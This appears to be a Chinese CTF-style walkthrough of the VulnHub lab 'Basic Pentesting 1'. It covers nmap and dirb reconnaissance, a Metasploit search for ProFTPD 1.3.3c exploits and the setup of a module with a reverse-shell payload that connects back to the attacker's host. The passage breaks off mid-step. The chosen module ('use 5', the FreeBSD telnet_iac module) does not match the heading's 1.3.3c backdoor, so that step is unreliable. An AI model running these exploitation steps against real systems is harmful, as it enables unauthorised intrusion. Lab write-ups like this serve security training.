{"id":311,"date":"2025-11-10T15:55:53","date_gmt":"2025-11-10T07:55:53","guid":{"rendered":"https:\/\/www.sanjiuctf.com\/?p=311"},"modified":"2025-11-10T15:55:54","modified_gmt":"2025-11-10T07:55:54","slug":"basic-pentesting-1","status":"publish","type":"post","link":"https:\/\/www.sanjiuctf.com\/?p=311","title":{"rendered":"Basic Pentesting 1"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large is-resized\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/www.sanjiuctf.com\/wp-content\/uploads\/2025\/11\/image-39-1024x550.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"550\" data-original=\"https:\/\/www.sanjiuctf.com\/wp-content\/uploads\/2025\/11\/image-39-1024x550.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-312\" style=\"width:644px;height:auto\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">\u9776\u573a\u4e0b\u8f7d\u5730\u5740\uff1a<a href=\"https:\/\/www.vulnhub.com\/\">https:\/\/www.vulnhub.com\/<\/a><\/p>\n\n\n\n<h2 class=\"wp-block-heading\">\u4e3b\u673a\u63a2\u6d4b\u4e0e\u7aef\u53e3\u626b\u63cf<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>nmap 192.168.11.0\/24<\/strong><\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>arp-scan -l<\/strong><\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u8fd9\u4e24\u4e2a\u90fd\u53ef\u4ee5<\/p>\n\n\n\n<figure class=\"wp-block-image size-full is-resized\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/www.sanjiuctf.com\/wp-content\/uploads\/2025\/11\/image-40.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"862\" height=\"729\" data-original=\"https:\/\/www.sanjiuctf.com\/wp-content\/uploads\/2025\/11\/image-40.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-313\" style=\"width:569px;height:auto\"  sizes=\"auto, (max-width: 862px) 100vw, 862px\" \/><\/div><\/figure>\n\n\n\n<pre class=\"wp-block-code\"><code>\u250c\u2500\u2500(root\u327fkali)-&#91;~\/\u684c\u9762]\n\u2514\u2500# nmap 192.168.11.0\/24              \nStarting Nmap 7.94SVN ( https:\/\/nmap.org ) at 2025-07-01 04:20 EDT\nNmap scan report for 192.168.11.1 (192.168.11.1)\nHost is up (0.000032s latency).\nNot shown: 993 closed tcp ports (reset)\nPORT     STATE SERVICE\n135\/tcp  open  msrpc\n139\/tcp  open  netbios-ssn\n445\/tcp  open  microsoft-ds\n903\/tcp  open  iss-console-mgr\n2222\/tcp open  EtherNetIP-1\n5357\/tcp open  wsdapi\n5555\/tcp open  freeciv\nMAC Address: 00:50:56:C0:00:08 (VMware)\n\nNmap scan report for 192.168.11.2 (192.168.11.2)\nHost is up (0.00041s latency).\nNot shown: 999 closed tcp ports (reset)\nPORT   STATE    SERVICE\n53\/tcp filtered domain\nMAC Address: 00:50:56:E7:08:6B (VMware)\n\nNmap scan report for 192.168.11.137 (192.168.11.137)\nHost is up (0.00011s latency).\nNot shown: 997 closed tcp ports (reset)\nPORT   STATE SERVICE\n21\/tcp open  ftp\n22\/tcp open  ssh\n80\/tcp open  http\nMAC Address: 00:0C:29:8E:E2:8D (VMware)\n\nNmap scan report for 192.168.11.254 (192.168.11.254)\nHost is up (0.00020s latency).\nAll 1000 scanned ports on 192.168.11.254 (192.168.11.254) are in ignored states.\nNot shown: 1000 filtered tcp ports (no-response)\nMAC Address: 00:50:56:F2:BC:1E (VMware)\n\nNmap scan report for 192.168.11.128 (192.168.11.128)\nHost is up (0.0000020s latency).\nAll 1000 scanned ports on 192.168.11.128 (192.168.11.128) are in ignored states.\nNot shown: 1000 closed tcp ports (reset)\n\nNmap done: 256 IP addresses (5 hosts up) scanned in 5.87 seconds\n<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">\u53d1\u73b0\u5f00\u542f\u4e8621 22 80 \u7aef\u53e3<\/p>\n\n\n\n<figure class=\"wp-block-image size-full is-resized\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/www.sanjiuctf.com\/wp-content\/uploads\/2025\/11\/image-41.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"842\" height=\"200\" data-original=\"https:\/\/www.sanjiuctf.com\/wp-content\/uploads\/2025\/11\/image-41.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-314\" style=\"width:708px;height:auto\"  sizes=\"auto, (max-width: 842px) 100vw, 842px\" \/><\/div><\/figure>\n\n\n\n<pre class=\"wp-block-code\"><code>\u250c\u2500\u2500(root\u327fkali)-&#91;~\/\u684c\u9762]\n\u2514\u2500# arp-scan -l\nInterface: eth0, type: EN10MB, MAC: 00:0c:29:b6:0a:72, IPv4: 192.168.11.128\nStarting arp-scan 1.10.0 with 256 hosts (https:\/\/github.com\/royhills\/arp-scan)\n192.168.11.1    00:50:56:c0:00:08       VMware, Inc.\n192.168.11.2    00:50:56:e7:08:6b       VMware, Inc.\n192.168.11.137  00:0c:29:8e:e2:8d       VMware, Inc.\n192.168.11.254  00:50:56:f2:bc:1e       VMware, Inc.\n\n4 packets received by filter, 0 packets dropped by kernel\nEnding arp-scan 1.10.0: 256 hosts scanned in 2.044 seconds (125.24 hosts\/sec). 4 responded\n<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">\u76ee\u6807\u9776\u673aIP\u4e3a192.168.11.137<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">\u7aef\u53e3\u4fe1\u606f<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">\u53ef\u4ee5\u76ee\u5f55\u626b\u63cf<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">dirsearch -u 192.168.11.137<\/p>\n\n\n\n<figure class=\"wp-block-image size-full is-resized\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/www.sanjiuctf.com\/wp-content\/uploads\/2025\/11\/image-42.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"806\" height=\"464\" data-original=\"https:\/\/www.sanjiuctf.com\/wp-content\/uploads\/2025\/11\/image-42.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-315\" style=\"width:724px;height:auto\"  sizes=\"auto, (max-width: 806px) 100vw, 806px\" \/><\/div><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">nmap 192.168.11.137 -sV -A -p-<\/p>\n\n\n\n<figure class=\"wp-block-image size-full is-resized\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/www.sanjiuctf.com\/wp-content\/uploads\/2025\/11\/image-43.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"942\" height=\"511\" data-original=\"https:\/\/www.sanjiuctf.com\/wp-content\/uploads\/2025\/11\/image-43.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-316\" style=\"width:733px;height:auto\"  sizes=\"auto, (max-width: 942px) 100vw, 942px\" \/><\/div><\/figure>\n\n\n\n<pre class=\"wp-block-code\"><code>\u250c\u2500\u2500(root\u327fkali)-&#91;~\/\u684c\u9762]\n\u2514\u2500# nmap  192.168.11.137 -sV -A -p-\nStarting Nmap 7.94SVN ( https:\/\/nmap.org ) at 2025-07-01 04:25 EDT\nNmap scan report for 192.168.11.137 (192.168.11.137)\nHost is up (0.00031s latency).\nNot shown: 65532 closed tcp ports (reset)\nPORT   STATE SERVICE VERSION\n21\/tcp open  ftp     ProFTPD 1.3.3c\n22\/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)\n| ssh-hostkey: \n|   2048 d6:01:90:39:2d:8f:46:fb:03:86:73:b3:3c:54:7e:54 (RSA)\n|   256 f1:f3:c0:dd:ba:a4:85:f7:13:9a:da:3a:bb:4d:93:04 (ECDSA)\n|_  256 12:e2:98:d2:a3:e7:36:4f:be:6b:ce:36:6b:7e:0d:9e (ED25519)\n80\/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))\n|_http-title: Site doesn't have a title (text\/html).\n|_http-server-header: Apache\/2.4.18 (Ubuntu)\nMAC Address: 00:0C:29:8E:E2:8D (VMware)\nDevice type: general purpose\nRunning: Linux 3.X|4.X\nOS CPE: cpe:\/o:linux:linux_kernel:3 cpe:\/o:linux:linux_kernel:4\nOS details: Linux 3.2 - 4.9\nNetwork Distance: 1 hop\nService Info: OSs: Unix, Linux; CPE: cpe:\/o:linux:linux_kernel\n\nTRACEROUTE\nHOP RTT     ADDRESS\n1   0.31 ms 192.168.11.137 (192.168.11.137)\n\nOS and Service detection performed. Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\nNmap done: 1 IP address (1 host up) scanned in 10.58 seconds\n<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">\u4e5f\u5c31\u662f\u8bf480\u7aef\u53e3\u6ca1\u6709\u53ef\u5229\u7528\u7684\u70b9\uff0c\u56de\u8fc7\u5934\u518d\u770b\u770b\u7aef\u53e3\u626b\u63cf\u65f6\u626b\u5230\u7684\u5176\u4ed6\u4fe1\u606f<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u4e4b\u540e\u662f\u572821\u7aef\u53e3\u7684<code>ftp<\/code>\u670d\u52a1\u4e2d\u627e\u5230\u4e86\u5229\u7528\u70b9\uff0c\u901a\u8fc7\u641c\u7d22\u5f15\u64ce\u641c\u7d22\u53d1\u73b0<code>ProFTPD 1.3.3c<\/code>\u8fd9\u4e2a\u7248\u672c\u662f\u6709\u6f0f\u6d1e\u7684<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u8bbf\u95ee\u4e00\u4e0b80web\u670d\u52a1\u770b\u770b<\/p>\n\n\n\n<figure class=\"wp-block-image size-large is-resized\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/www.sanjiuctf.com\/wp-content\/uploads\/2025\/11\/image-44-1024x405.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"405\" data-original=\"https:\/\/www.sanjiuctf.com\/wp-content\/uploads\/2025\/11\/image-44-1024x405.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-317\" style=\"width:715px;height:auto\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">\u53d1\u73b0\u4ec0\u4e48\u90fd\u6ca1\u6709\u6dfb\u52a0\u5185\u5bb9<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">\u76ee\u5f55\u626b\u63cf\u770b\u770b<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">dirb <a href=\"http:\/\/192.168.11.137\">http:\/\/192.168.11.137<\/a><\/p>\n\n\n\n<figure class=\"wp-block-image size-full is-resized\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/www.sanjiuctf.com\/wp-content\/uploads\/2025\/11\/image-45.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"660\" height=\"606\" data-original=\"https:\/\/www.sanjiuctf.com\/wp-content\/uploads\/2025\/11\/image-45.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-318\" style=\"width:489px;height:auto\"  sizes=\"auto, (max-width: 660px) 100vw, 660px\" \/><\/div><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">\u65e0\u53ef\u7528\u4fe1\u606f\uff0c\u626b\u63cf\u7aef\u53e3\u4fe1\u606f\u7684\u65f6\u5019\uff0c\u5f00\u542f\u7684ftp\u670d\u52a1\u7248\u672c\u8c8c\u4f3c\u6709\u6f0f\u6d1e<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">\u4f7f\u7528msfconsole\u67e5\u770b<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">msfconsole<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">search ProFTPD<\/p>\n\n\n\n<figure class=\"wp-block-image size-full is-resized\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/www.sanjiuctf.com\/wp-content\/uploads\/2025\/11\/image-46.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"866\" height=\"642\" data-original=\"https:\/\/www.sanjiuctf.com\/wp-content\/uploads\/2025\/11\/image-46.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-319\" style=\"width:621px;height:auto\"  sizes=\"auto, (max-width: 866px) 100vw, 866px\" \/><\/div><\/figure>\n\n\n\n<pre class=\"wp-block-code\"><code>\u2500\u2500(root\u327fkali)-&#91;~\/\u684c\u9762]\n\u2514\u2500# msfconsole\nMetasploit tip: Use the 'capture' plugin to start multiple \nauthentication-capturing and poisoning services\n\n ______________________________________________________________________________\n|                                                                              |\n|                   METASPLOIT CYBER MISSILE COMMAND V5                        |\n|______________________________________________________________________________|\n                                        \/                      \/\n            .                          \/                      \/            x\n                                      \/                      \/\n                                     \/          +           \/\n                      +             \/                      \/\n           *                        \/                      \/\n                                   \/      .               \/\n    X                             \/                      \/            X\n                                 \/                     ###\n                                \/                     # % #\n                               \/                       ###\n                      .       \/\n     .                       \/      .            *           .\n                            \/\n                           *\n                  +                       *\n\n                                       ^\n####      __     __     __          #######         __     __     __        ####\n####    \/     \/     \/          ###########     \/     \/     \/          ####\n################################################################################\n################################################################################\n# WAVE 5 ######## SCORE 31337 ################################## HIGH FFFFFFFF #\n################################################################################\n                                                           https:&#47;&#47;metasploit.com\n\n       =&#91; metasploit v6.4.18-dev                          ]\n+ -- --=&#91; 2437 exploits - 1255 auxiliary - 429 post       ]\n+ -- --=&#91; 1471 payloads - 47 encoders - 11 nops           ]\n+ -- --=&#91; 9 evasion                                       ]\n\nMetasploit Documentation: https:\/\/docs.metasploit.com\/\n<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">\u7136\u540e\u76f4\u63a5\u641c\u7d22\u7248\u672c\u53f7<code>ProFTPD 1.3.3c<\/code>\uff0c\u786e\u5b9e\u627e\u5230\u4e86\u5bf9\u5e94\u6f0f\u6d1e\u7684<code>exp<\/code>\u811a\u672c<\/p>\n\n\n\n<figure class=\"wp-block-image size-full is-resized\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/www.sanjiuctf.com\/wp-content\/uploads\/2025\/11\/image-47.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"965\" height=\"230\" data-original=\"https:\/\/www.sanjiuctf.com\/wp-content\/uploads\/2025\/11\/image-47.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-320\" style=\"width:786px;height:auto\"  sizes=\"auto, (max-width: 965px) 100vw, 965px\" \/><\/div><\/figure>\n\n\n\n<pre class=\"wp-block-code\"><code>\nmsf6 &gt; search ProFTPD 1.3.3c\n\nMatching Modules\n================\n\n   #  Name                                    Disclosure Date  Rank       Check  Description\n   -  ----                                    ---------------  ----       -----  -----------\n   0  exploit\/unix\/ftp\/proftpd_133c_backdoor  2010-12-02       excellent  No     ProFTPD-1.3.3c Backdoor Command Execution\n\nInteract with a module by name or index. For example info 0, use 0 or use exploit\/unix\/ftp\/proftpd_133c_backdoor\n<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-full is-resized\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/www.sanjiuctf.com\/wp-content\/uploads\/2025\/11\/image-48.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"957\" height=\"582\" data-original=\"https:\/\/www.sanjiuctf.com\/wp-content\/uploads\/2025\/11\/image-48.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-321\" style=\"width:656px;height:auto\"  sizes=\"auto, (max-width: 957px) 100vw, 957px\" \/><\/div><\/figure>\n\n\n\n<pre class=\"wp-block-code\"><code>msf6 &gt; search ProFTPD\n\nMatching Modules\n================\n\n   #   Name                                                                 Disclosure Date  Rank       Check  Description\n   -   ----                                                                 ---------------  ----       -----  -----------\n   0   exploit\/linux\/misc\/netsupport_manager_agent                          2011-01-08       average    No     NetSupport Manager Agent Remote Buffer Overflow\n   1   exploit\/linux\/ftp\/proftp_sreplace                                    2006-11-26       great      Yes    ProFTPD 1.2 - 1.3.0 sreplace Buffer Overflow (Linux)                                                                   \n   2     _ target: Automatic Targeting                                     .                .          .      .\n   3     _ target: Debug                                                   .                .          .      .\n   4     _ target: ProFTPD 1.3.0 (source install) \/ Debian 3.1             .                .          .      .\n   5   exploit\/freebsd\/ftp\/proftp_telnet_iac                                2010-11-01       great      Yes    ProFTPD 1.3.2rc3 - 1.3.3b Telnet IAC Buffer Overflow (FreeBSD)                                                         \n   6     _ target: Automatic Targeting                                     .                .          .      .\n   7     _ target: Debug                                                   .                .          .      .\n   8     _ target: ProFTPD 1.3.2a Server (FreeBSD 8.0)                     .                .          .      .\n   9   exploit\/linux\/ftp\/proftp_telnet_iac                                  2010-11-01       great      Yes    ProFTPD 1.3.2rc3 - 1.3.3b Telnet IAC Buffer Overflow (Linux)                                                           \n   10    _ target: Automatic Targeting                                     .                .          .      .\n   11    _ target: Debug                                                   .                .          .      .\n   12    _ target: ProFTPD 1.3.3a Server (Debian) - Squeeze Beta1          .                .          .      .\n   13    _ target: ProFTPD 1_3_3a Server (Debian) - Squeeze Beta1 (Debug)  .                .          .      .\n   14    _ target: ProFTPD 1.3.2c Server (Ubuntu 10.04)                    .                .          .      .\n   15  exploit\/unix\/ftp\/proftpd_modcopy_exec                                2015-04-22       excellent  Yes    ProFTPD 1.3.5 Mod_Copy Command Execution                                                                               \n   16  exploit\/unix\/ftp\/proftpd_133c_backdoor                               2010-12-02       excellent  No     ProFTPD-1.3.3c Backdoor Command Execution                                                                              \n\nInteract with a module by name or index. For example info 16, use 16 or use exploit\/unix\/ftp\/proftpd_133c_backdoor\n<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">\u4f7f\u7528\u7b2c\u4e94\u4e2a\uff0c1.3.3c<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">use 5<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">show options<\/p>\n\n\n\n<figure class=\"wp-block-image size-full is-resized\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/www.sanjiuctf.com\/wp-content\/uploads\/2025\/11\/image-49.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"919\" height=\"601\" data-original=\"https:\/\/www.sanjiuctf.com\/wp-content\/uploads\/2025\/11\/image-49.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-322\" style=\"width:555px;height:auto\"  sizes=\"auto, (max-width: 919px) 100vw, 919px\" \/><\/div><\/figure>\n\n\n\n<pre class=\"wp-block-code\"><code>msf6 &gt; use5\n&#91;-] Unknown command: use5. Did you mean use? Run the help command for more details.\nmsf6 &gt; use 5\n&#91;*] No payload configured, defaulting to bsd\/x86\/shell\/reverse_tcp\nmsf6 exploit(freebsd\/ftp\/proftp_telnet_iac) &gt; show options\n\nModule options (exploit\/freebsd\/ftp\/proftp_telnet_iac):\n\n   Name     Current Setting      Required  Description\n   ----     ---------------      --------  -----------\n   FTPPASS  mozilla@example.com  no        The password for the specified username\n   FTPUSER  anonymous            no        The username to authenticate as\n   RHOSTS                        yes       The target host(s), see https:\/\/docs.metasploit.com\/docs\/using-metaspl\n                                           oit\/basics\/using-metasploit.html\n   RPORT    21                   yes       The target port (TCP)\n\nPayload options (bsd\/x86\/shell\/reverse_tcp):\n\n   Name   Current Setting  Required  Description\n   ----   ---------------  --------  -----------\n   LHOST  192.168.11.128   yes       The listen address (an interface may be specified)\n   LPORT  4444             yes       The listen port\n\nExploit target:\n\n   Id  Name\n   --  ----\n   0   Automatic Targeting\n\nView the full module info with the info, or info -d command.\n\nmsf6 exploit(freebsd\/ftp\/proftp_telnet_iac) &gt; \n<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">\u8bbe\u7f6eRHOSTS\u4e3a\u9776\u673aip\u5730\u5740<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">set RHOSTS 192.168.11.137<\/p>\n\n\n\n<figure class=\"wp-block-image size-full is-resized\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/www.sanjiuctf.com\/wp-content\/uploads\/2025\/11\/image-50.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"774\" height=\"49\" data-original=\"https:\/\/www.sanjiuctf.com\/wp-content\/uploads\/2025\/11\/image-50.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-323\" style=\"width:818px;height:auto\"  sizes=\"auto, (max-width: 774px) 100vw, 774px\" \/><\/div><\/figure>\n\n\n\n<pre class=\"wp-block-code\"><code>msf6 exploit(freebsd\/ftp\/proftp_telnet_iac) &gt; set RHOSTS 192.168.11.137\nRHOSTS =&gt; 192.168.11.137\n<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">\u8bbe\u7f6epayload<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">set payload cmd\/unix\/reverse<\/p>\n\n\n\n<figure class=\"wp-block-image size-full is-resized\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/www.sanjiuctf.com\/wp-content\/uploads\/2025\/11\/image-51.png'><img class=\"lazyload lazyload-style-1\" 